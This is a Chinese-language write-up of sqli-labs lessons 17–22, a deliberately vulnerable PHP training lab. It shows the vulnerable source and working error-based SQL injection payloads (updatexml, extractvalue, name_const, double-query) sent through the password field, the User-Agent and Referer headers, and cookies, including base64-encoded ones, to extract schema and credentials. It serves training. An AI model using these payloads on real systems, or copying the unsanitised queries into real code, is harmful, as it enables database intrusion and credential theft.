Less-17 POST-Updata Query-Error Based-String
基于错误的更新查询post字符注入
测试
页面显示 PASSWORD RESET 重置密码
uname=test&passwd=test2返回页面显示重置错误
uname=admin&passwd=test2返回页面显示重置密码成功
应该是用户名正确即可重置密码
页面源代码
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,15);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'New Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
if($row)
{
//echo '<font color= "#0000ff">';
$row1 = $row['username'];
//echo 'Your Login name:'. $row1;
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
echo "<br>";
if (mysql_error())
{
echo '<font color= "#FFFF00" font size = 3 >';
print_r(mysql_error());
echo "</br></br>";
echo "</font>";
}
else
{
echo '<font color= "#FFFF00" font size = 3 >';
//echo " You password has been successfully updated " ;
echo "<br>";
echo "</font>";
}
echo '<img src="../images/flag1.jpg" />';
//echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font size="4.5" color="#FFFF00">';
//echo "Bug off you Silly Dumb hacker";
echo "</br>";
echo '<img src="../images/slap1.jpg" />';
echo "</font>";
}
}
?>
源代码分析
定义了对输入的用户名检查的函数,要求不能为空,长度为15,超过则截取15位;若开启了魔术方法,则反斜线将被去除,但是两个反斜线将会被替换成一个;纯数字检测,若为字符则用mysql_real_escape_string对其进行转义,纯数字则转换位int型返回。该函数只对用户名进行了检验,而sql语句则只验证了是否存在该用户,没有验证对应的密码
SELECT username, password FROM users WHERE username= $uname LIMIT 0,1
修改成功则返回一张包含success的图片,失败则返回失败的图片。
payload
这里参考网上有三种方式对update、insert、delete进行sql注入
1、 子查询注入
子查询注入即为之前说到的双查询注入(具体可以参考Less-5)
uname=admin&passwd=' or (select 1 from(select count(*),concat((select concat(0x7e,0x27,database(),0x27,0x7e)),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin' %23
返回 Duplicate entry '~'security'~0' for key 'group_key'
获取表
uname=admin&passwd=' or (select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin' %23
字段名
uname=admin&passwd=' or (select 1 from(select count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23
获取用户信息
uname=admin&passwd=' or (select 1 from(select count(*),concat((select concat(0x27,id,0x7e,username,0x7e,password,0x27) from users limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23
返回 Duplicate entry ''1~Dumb~Dumb'1' for key 'group_key'
2、通过name_const():
name_connsta(name,value):返回给定的值。用于生成结果集列时,NAME_CONST()会使该列具有给定的名称。参数应该是常量。适用于低版本。
uname=admin&passwd=1' or (select * from (select(name_const(database(),1)),name_const(database(),1))a) where username='admin'%23
报错 Incorrect arguments to NAME_CONST 数据库版本太高了
固定格式:
... or (select * from(select name_const((select ...),1),name_const((select...),1))a) ...
对于update,insert,delete都有一个固定结构:… or (select * from(select name_const((select …),1),name_const((select…),1))a) …
3、通过updatexml()
payload: updatexml(1,concat(0x7e,(version())),0)
updatexml(xml_target,xpath_expr,new_xml)函数:
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串)
第三个参数:new_value,String格式,替换查找到的符合条件的数据
作用:改变文档中符合条件的节点的值
在这里只要改变第二个参数使其报错即可,由于对第一个参数进行了过滤检查,这里对passwd字段进行注入
改变XML_document中符合XPATH_string的值
payload
uname=admin&passwd=a' or updatexml(1,concat(0x2b,version(),0x2b),1) %23
返回 XPATH syntax error: '+5.5.53+'
uname=admin&passwd=a' or updatexml(1,concat(0x2b,database(),0x2b),1) %23
返回:XPATH syntax error: '+security+'
uname=admin&passwd=a' or updatexml(1,concat(0x2b,(select group_concat(schema_name) from information_schema.schemata),0x2b),1) %23
返回:XPATH syntax error: '+information_schema,challenges,m'在这里只返回了部分信息
获取数据库名
uname=admin&passwd=a' or updatexml(1,concat(0x2b,(select schema_name from information_schema.schemata limit 0,1),0x2b),1) %23
返回:XPATH syntax error: '+information_schema+'
获取表名
uname=admin&passwd=a' or updatexml(1,concat(0x2b,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x2b),1) %23
返回:XPATH syntax error: '+emails+'
获取列名
uname=admin&passwd=a' or updatexml(1,concat(0x2b,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x2b),1) %23
XPATH syntax error: '+id+'
获取用户信息:
1、双注入查询
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select * from(select concat_ws(char(32,44,32),id,username,password) from users limit 7,1)a),0x7e),0)#
返回XPATH syntax error: '~8 , admin , admin~'
这里要注意可能由于之前的更新操作把数据库里一些密码清空了
4、extractvalue()
EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称
第二个参数:XPath_string (Xpath格式的字符串).
作用:从目标XML中返回包含所查询值的字符串
适用与updatexml()相似
payload
uname=admin&passwd=a' or extractvalue(1,concat(0x2b,version(),0x2b)) %23
返回:XPATH syntax error: '+5.5.53+'
uname=admin&passwd=a' or extractvalue(1,concat(0x2b,database(),0x2b)) %23
返回:XPATH syntax error: '+security+'
获取数据库名
uname=admin&passwd=a' or extractvalue(1,concat(0x2b,(select schema_name from information_schema.schemata limit 0,1) ,0x2b)) %23
返回:XPATH syntax error: '+information_schema+'
其他与updatexml()相似
Less-18 POST-Header Injection-Uagent field-Error based
基于错误的对头部UserAgent的post注入
测试
打开页面显示IP地址
Your IP ADDRESS is: 192.168.83.140
对post参数测试没有任何反应
查看源代码
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,20);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];
echo "<br>";
echo 'Your IP ADDRESS is: ' .$IP;
echo "<br>";
//echo 'Your User Agent is: ' .$uagent;
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
/*
echo 'Your Your User name:'. $uname;
echo "<br>";
echo 'Your Password:'. $passwd;
echo "<br>";
echo 'Your User Agent String:'. $uagent;
echo "<br>";
echo 'Your User Agent String:'. $IP;
*/
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Agent:'.$uname."\n");
fclose($fp);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
echo '<font color= "#FFFF00" font size = 3 >';
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);
//echo 'Your IP ADDRESS is: ' .$IP;
echo "</font>";
//echo "<br>";
echo '<font color= "#0000ff" font size = 3 >';
echo 'Your User Agent is: ' .$uagent;
echo "</font>";
echo "<br>";
print_r(mysql_error());
echo "<br><br>";
echo '<img src="../images/flag.jpg" />';
echo "<br>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
?>
一开始就会回显登入的IP地址,然后对username的两个参数进行了检查过滤,所以这里测试时没有任何显示,sql语句验证了登入的账号密码是否相同,只有账号密码正确才能进行下一步的操作,可以这里是在已经注册了账号的前提下进行测试;正确登入后做了一个向security.uagents表插入useragent,ip地址,用户名的操作,再回显useragent,如果登入失败会进行报错。
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)"
测试
uname=admin&passwd=admin
返回
Your IP ADDRESS is: 192.168.83.140
Your User Agent is: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
由于对username和password进行了过滤,这里考虑对没有进行过滤操作的uagents和ip_addr进行注入测试
使用burpsuit的repeater进行测试
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'
返回
near '192.168.83.140', 'admin')' at line 1
分析:由单引号包裹,最后又括号闭合
构造payload
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0',1,2)#
返回正常
Your User Agent is: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0',1,2)#
尝试在后面添加查询语句
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0',(select database()),2)#
并没有返回我们想要的信息
使用updatexml()进行注入
版本号
'or updatexml(1,concat(0x2b,version(),0x2b),1))#
返回:XPATH syntax error: '+5.5.53+'
当前数据库名
'or updatexml(1,concat(0x2b,database(),0x2b),1))#
XPATH syntax error: '+security+'
所有数据库名
'or updatexml(1,concat(0x2b,(select schema_name from information_schema.schemata limit 0,1),0x2b),1))#
XPATH syntax error: '+information_schema+'
表名
'or updatexml(1,concat(0x2b,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x2b),1))#
XPATH syntax error: '+emails+'
列名
'or updatexml(1,concat(0x2b,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x2b),1))#
XPATH syntax error: '+id+'
XPATH syntax error: '+username+'
XPATH syntax error: '+password+'
获取账号信息
'or updatexml(1,concat(0x2b,(select group_concat(username,password) from security.users limit 0,1),0x2b),1))#
XPATH syntax error: '+DumbDumb,AngelinaI-kill-you,Dum'
在这里使用extractvalue()同样可以,注意是两个参数
'or extractvalue(1,concat(0x2b,(select group_concat(username,password) from security.users limit 0,1),0x2b)))#
XPATH syntax error: '+DumbDumb,AngelinaI-kill-you,Dum'
Less-19 POST-Header Injection-Referer field-Error based
基于错误的对头部Referer的post注入
分析
这里与Less-18相似,只不过注入的地方变成了referer,使用已知的账号密码登入
uname=admin&passwd=admin
Your IP ADDRESS is: 192.168.83.140
Your Referer is:
burpsuit抓包如下
POST /sqli-labs/Less-19/ HTTP/1.1
Host: 192.168.83.141
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Forwarded-For: 123.232.23.245
CLTENT-IP: 123.232.23.245
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
uname=admin&passwd=admin
我们看到上述请求中并没有referer
这里使用hackbar或burpsuit
直接在请求中添加
Referer: https://localhost/sql-labs/Less-19'or updatexml(1,concat(0x2b,version(),0x2b),1))#
XPATH syntax error: '+5.5.53+'
其他同上
在使用hackbar测试时遇到了一些麻烦,注释符号# 和–一直不起作用,抓包后发现没有了注释符#虽然有–,担不起作用,使用%23,这里的编码问题
Less-20 POST-Cookie injection-Uagent field-error based
基于错误的对头部cookie的post注入
测试
uname=admin&passwd=admin
返回
YOUR USER AGENT IS : Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
YOUR IP ADDRESS IS : 192.168.83.140
DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE
YOUR COOKIE : uname = admin and expires: Thu 26 Apr 2018 - 02:45:27
Your Login name:admin
Your Password:admin
Your ID:8
这里将一些关键信息都显示了,
注意下面有个按钮 Delete You cookie! ,点击后直接跳转到登入页面,可以推测应该有一个对cookie进行操作的过程
burpsuit抓取删除cookie操作的数据包
POST /sqli-labs/Less-20/index.php HTTP/1.1
Host: 192.168.83.141
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.83.141/sqli-labs/Less-20/index.php
Cookie: uname=admin
X-Forwarded-For: 123.232.23.245
CLTENT-IP: 123.232.23.245
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
submit=Delete+Your+Cookie%21
源代码
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
if(!isset($_COOKIE['uname']))
{
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome <font color='#FF0000'> Dhakkan </font><br></div>";
echo "<div align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";
echo "<div style='padding-top:10px; font-size:15px;'>";
echo "<!--Form to post the contents -->";
echo '<form action=" " name="form1" method="post">';
echo ' <div style="margin-top:15px; height:30px;">Username : ';
echo ' <input type="text" name="uname" value=""/> </div>';
echo ' <div> Password : ';
echo ' <input type="text" name="passwd" value=""/></div></br>';
echo ' <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';
echo '</form>';
echo '</div>';
echo '</div>';
echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';
echo '<font size="3" color="#FFFF00">';
echo '<center><br><br><br>';
echo '<img src="../images/Less-20.jpg" />';
echo '</center>';
function check_input($value)
{
if(!empty($value))
{
$value = substr($value,0,20); // truncation (see comments)
}
if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled
{
$value = stripslashes($value);
}
if (!ctype_digit($value)) // Quote if not a number
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
echo "<br>";
echo "<br>";
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
$cookee = $row1['username'];
if($row1)
{
echo '<font color= "#FFFF00" font size = 3 >';
setcookie('uname', $cookee, time()+3600);
header ('Location: index.php');
echo "I LOVE YOU COOKIES";
echo "</font>";
echo '<font color= "#0000ff" font size = 3 >';
//echo 'Your Cookie is: ' .$cookee;
echo "</font>";
echo "<br>";
print_r(mysql_error());
echo "<br><br>";
echo '<img src="../images/flag.jpg" />';
echo "<br>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
echo "</font>";
echo '</font>';
echo '</div>';
}
else
{
if(!isset($_POST['submit']))
{
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "<center>";
echo '<br><br><br>';
echo '<img src="../images/Less-20.jpg" />';
echo "<br><br><b>";
echo '<br><font color= "red" font size="4">';
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "</font><br>";
echo '<font color= "cyan" font size="4">';
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
echo "</font><br>";
echo '<font color= "#FFFF00" font size = 4 >';
echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
echo '<font color= "orange" font size = 5 >';
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
echo "<br></font>";
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
$result=mysql_query($sql);
if (!$result)
{
die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "pink" font size="5">';
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo '<font color= "grey" font size="5">';
echo 'Your Password:' .$row['password'];
echo "</font></b>";
echo "<br>";
echo 'Your ID:' .$row['id'];
}
else
{
echo "<center>";
echo '<br><br><br>';
echo '<img src="../images/slap1.jpg" />';
echo "<br><br><b>";
//echo '<img src="../images/Less-20.jpg" />';
}
echo '<center>';
echo '<form action="" method="post">';
echo '<input type="submit" name="submit" value="Delete Your Cookie!" />';
echo '</form>';
echo '</center>';
}
else
{
echo '<center>';
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
echo '<font color= "#FFFF00" font size = 6 >';
echo " Your Cookie is deleted";
setcookie('uname', $row1['username'], time()-3600);
header ('Location: index.php');
echo '</font></center></br>';
}
echo "<br>";
echo "<br>";
//header ('Location: main.php');
echo "<br>";
echo "<br>";
//echo '<img src="../images/slap.jpg" /></center>';
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'Cookie:'.$cookee."\n");
fclose($fp);
}
?>
分析
1、判断cookie是否存在,不存在则进行登入验证
2、登入时对uname,passwd先进行过滤,过滤后验证是否正确,将变量cookie赋值为username,设置cookie为uname+time()+3600
3、没点击submit按钮,则显示详细信息,包括user agent、IP、cookie,查询对应cookie的账号密码并显示
4、若点击了submit按钮,重置cookie,并重定向到登入页面
关键代码,对cookie对应的用户进行了查询,且变量$cookee并未进行过滤,而该变量的值是由username传递而来
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
payload
添加单引号测试
Cookie: uname=admin'
返回:near ''admin'' LIMIT 0,1' at line 1由单引号包裹
admin'or 1=1# 返回正常
遍历数据库名
admin'or updatexml(1,concat(0x2b,(select schema_name from information_schema.schemata limit 0,1),0x2b),1)#
XPATH syntax error: '+information_schema+'
其他同上
Less-21 Cookie Injection- Error Based- complex - string
Less-21与Less-20的不同之处在于cookie对uname进行了bse64编码
setcookie('uname', base64_encode($row1['username']), time()+3600);
测试
uname=admin'经过base64编码后
uname=YWRtaW4n
near ''admin'') LIMIT 0,1' at line 1
可以看到由单引号和括号包裹
admin' or 1=1)#
YWRtaW4nIG9yIDE9MSkj返回正常
构造payload
遍历系统数据库名
admin' or updatexml(1,concat(0x2b,(select schema_name from information_schema.schemata limit 0,1),0x2b),1))#
YWRtaW4nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDJiLChzZWxlY3Qgc2NoZW1hX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuc2NoZW1hdGEgbGltaXQgMCwxKSwweDJiKSwxKSkj
返回XPATH syntax error: '+information_schema+'
其他同上
Less-22 Cookie Injection- Error Based- Double Quotes - string
测试
uname=admin'
uname=YWRtaW4n
未报错
admin"
YWRtaW4i
near '"admin"" LIMIT 0,1' at line 1
由双引号包裹
admin" or 1=1#
YWRtaW4iIG9yIDE9MSM=返回正常
构造payload
admin" or updatexml(1,concat(0x2b,(select schema_name from information_schema.schemata limit 0,1),0x2b),1)#
YWRtaW4iIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDJiLChzZWxlY3Qgc2NoZW1hX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuc2NoZW1hdGEgbGltaXQgMCwxKSwweDJiKSwxKSM=
XPATH syntax error: '+information_schema+'
其他同上